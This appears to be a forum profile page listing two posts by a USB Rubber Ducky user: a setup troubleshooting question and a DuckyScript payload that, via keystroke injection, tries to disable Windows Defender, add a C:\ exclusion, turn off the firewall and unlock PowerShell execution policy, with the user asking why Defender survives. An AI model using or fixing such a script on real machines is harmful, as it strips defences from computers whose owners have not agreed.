Jump to content

Rusty_83

Members
  • Posts

    2
  • Joined

  • Last visited

1 Follower

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Rusty_83's Achievements

  1. Ok I'm not sure what exactly I've done differently, but all seems to be working now on the ducky. However I haven't been able to disable Windows Defender. The script I used is as follows: ------------------------------------------- DELAY 3000 GUI x DELAY 500 STRINGLN a DELAY 1000 ATTACKMODE HID DELAY 500 REM STAGE 2 Stop Windows Defender Anti Virus******** REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy REM Unrestricted}" DELAY 1000 STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true"; DELAY 1000 STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\"; DELAY 500 STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; DELAY 1000 STRINGLN netsh advfirewall set allprofiles state off DELAY 1000 STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false DELAY 1000 SHIFT y DELAY 500 ENTER; ----------------------------------------------------- However Windows Defender is still running. Any ideas?
  2. Hi, I've just received the rubber ducky and as far as I can tell, the ducky doesn't do a single thing. I've used the payload generator to create the inject.bin file, replaced the inject.bin file on the root of the ducky and tried a number of scripts, but simply nothing happens when I insert the USB. When I press the button, the ducky returns to STORAGE mode and I can see the USB device 'DUCKY'. The LED is constantly green. I'm using Windows 11. What am I doing wrong? Thanks for any help
×
×
  • Create New...